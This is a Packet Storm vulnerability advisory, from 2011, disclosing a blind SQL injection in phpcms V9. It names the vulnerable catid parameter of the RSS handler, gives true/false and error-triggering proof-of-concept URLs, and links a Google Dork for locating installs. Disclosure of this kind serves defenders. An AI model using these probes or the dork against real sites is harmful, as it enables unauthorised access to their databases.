PHP CMS 9 Blind SQL Injection

2011-01-22T00:00:00
ID PACKETSTORM:97759
Type packetstorm
Reporter eidelweiss
Modified 2011-01-22T00:00:00

Description

                                        
                                            `=================================================================  
phpcms V9 BLind SQL Injection Vulnerability  
=================================================================  
  
Software: phpcms V9  
Vendor: www.phpcms.cn  
Vuln Type: BLind SQL Injection  
Download link: http://www.phpcms.cn/2010/1229/326.html  
Author: eidelweiss  
contact: eidelweiss[at]windowslive[dot]com  
Home: www.eidelweiss.info  
  
Google Dork: http://www.exploit-db.com/ghdb/3676/ // check here ^_^  
  
References:  
http://eidelweiss-advisories.blogspot.com/2011/01/phpcms-v9-blind-sql-injection.html  
  
=================================================================  
  
exploit & p0c  
  
[!] index.php?m=content&c=rss&catid=[valid catid]  
  
Example p0c  
  
[!] http://host/index.php?m=content&c=rss&catid=10 <= True  
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False  
  
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)  
  
=================================================================  
  
Nothing Impossible In This World Even Nobody`s Perfect  
  
=================================================================  
  
=========================| -=[ E0F ]=- |=========================  
`